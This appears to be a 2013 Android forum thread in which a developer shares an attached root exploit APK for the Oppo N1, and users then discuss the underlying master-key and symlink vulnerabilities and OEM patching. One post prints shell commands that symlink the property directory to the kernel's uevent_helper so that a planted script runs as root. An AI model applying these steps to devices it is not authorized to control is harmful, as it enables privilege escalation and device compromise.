Post Reply

APK root exploit

23rd November 2013, 06:25 PM   |  #1  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 7,847
 
3,816 posts
Join Date:Joined: Feb 2010
Donate to Me
More
I tweeted this a couple week ago before the N1 was publicly out but here you go, nothing fancy, no real ui or output.

Thanks to Saurik and Giantpune for contributing (ie its based on their research)

Install apk, run apk wait 1 minute, install supersu app from market then uninstall with this command

adb uninstall com.qualcomm.privinit
Attached Files
File Type: apk Oppown-build3.apk - [Click for QR Code] (368.9 KB, 7394 views)
The Following 13 Users Say Thank You to jcase For This Useful Post: [ View ]
24th November 2013, 12:15 AM   |  #2  
Mr_Bartek's Avatar
Senior Member
Thanks Meter: 392
 
1,168 posts
Join Date:Joined: Jun 2009
Donate to Me
More
Do you have a link to their research or are their findings private?

Regards,
24th November 2013, 12:41 AM   |  #3  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 7,847
 
3,816 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by Mr_Bartek

Do you have a link to their research or are their findings private?

Regards,

saurik - his analysis of the "second master key vuln"

giantpune for his symlnink attack vuln in property space:

Code:
/system/bin/mv /data/property /data/backupprop
/system/bin/mkdir /data/property
/system/bin/ln -s /sys/kernel/uevent_helper /data/property/.temp
/system/bin/setprop persist.sys.fail /data/pwn.sh
The Following 2 Users Say Thank You to jcase For This Useful Post: [ View ]
24th November 2013, 03:00 AM   |  #4  
Senior Member
Flag Bangalore
Thanks Meter: 97
 
451 posts
Join Date:Joined: Jun 2012
More
Angry
Quote:
Originally Posted by jcase

I tweeted this a couple week ago before the N1 was publicly out but here you go, nothing fancy, no real ui or output.

Thanks to Saurik and Giantpune for contributing (ie its based on their research)

Install apk, run apk wait 1 minute, install supersu app from market then uninstall with this command

adb uninstall com.qualcomm.privinit

Will this exploit work in any other device. when i try to install the play store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown.
24th November 2013, 03:08 AM   |  #5  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 7,847
 
3,816 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by coolrevi

Will this exploit work in any other device. when i try to install the play store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown.

Possibly other oppo devices

No it doesnt fix the vuln, just becareful where you install apps from
24th November 2013, 10:27 AM   |  #6  
Ricky Divjakovski's Avatar
Recognized Contributor
Flag Sydney
Thanks Meter: 5,292
 
3,588 posts
Join Date:Joined: Feb 2013
Donate to Me
More
Quote:
Originally Posted by jcase

Possibly other oppo devices

No it doesnt fix the vuln, just becareful where you install apps from

a second mater key vulnurability? hmm, so this could might not be patched in 4.4?
great job by the way, i dont have the device but this is interesting!
24th November 2013, 11:40 AM   |  #7  
Quote:
Originally Posted by ricky310711

a second mater key vulnurability? hmm, so this could might not be patched in 4.4?
great job by the way, i dont have the device but this is interesting!

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely
24th November 2013, 12:02 PM   |  #8  
Ricky Divjakovski's Avatar
Recognized Contributor
Flag Sydney
Thanks Meter: 5,292
 
3,588 posts
Join Date:Joined: Feb 2013
Donate to Me
More
Quote:
Originally Posted by pulser_g2

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely

so your saying in most devices the master key patch could be a possible vulnurabillity still in 4.3?

interesting...
24th November 2013, 05:17 PM   |  #9  
jcase's Avatar
OP Forum Moderator / Senior Recognized Developer - Taco Vendor
Flag Sequim WA
Thanks Meter: 7,847
 
3,816 posts
Join Date:Joined: Feb 2010
Donate to Me
More
Quote:
Originally Posted by ricky310711

so your saying in most devices the master key patch could be a possible vulnurabillity still in 4.3?

interesting...

It depends on if OEMs backported it, depends on which build OEMs used and depends on the bug. Four or five different zip parser bugs with similar results. This one I used was patched in 4.3, but other exist.
The Following User Says Thank You to jcase For This Useful Post: [ View ]
1st January 2014, 02:22 AM   |  #10  
Junior Member
Thanks Meter: 0
 
2 posts
Join Date:Joined: Dec 2006
Im trying to figure out why oppown apk will not install in my n1. everytime i try it just. Says app not installed. But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? all ive done is update to the latest ota software and im currently located in indonesia if that makes a difference.

Post Reply Subscribe to Thread
Previous Thread Next Thread
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


Top Threads in N1 Original Android Development by ThreadRank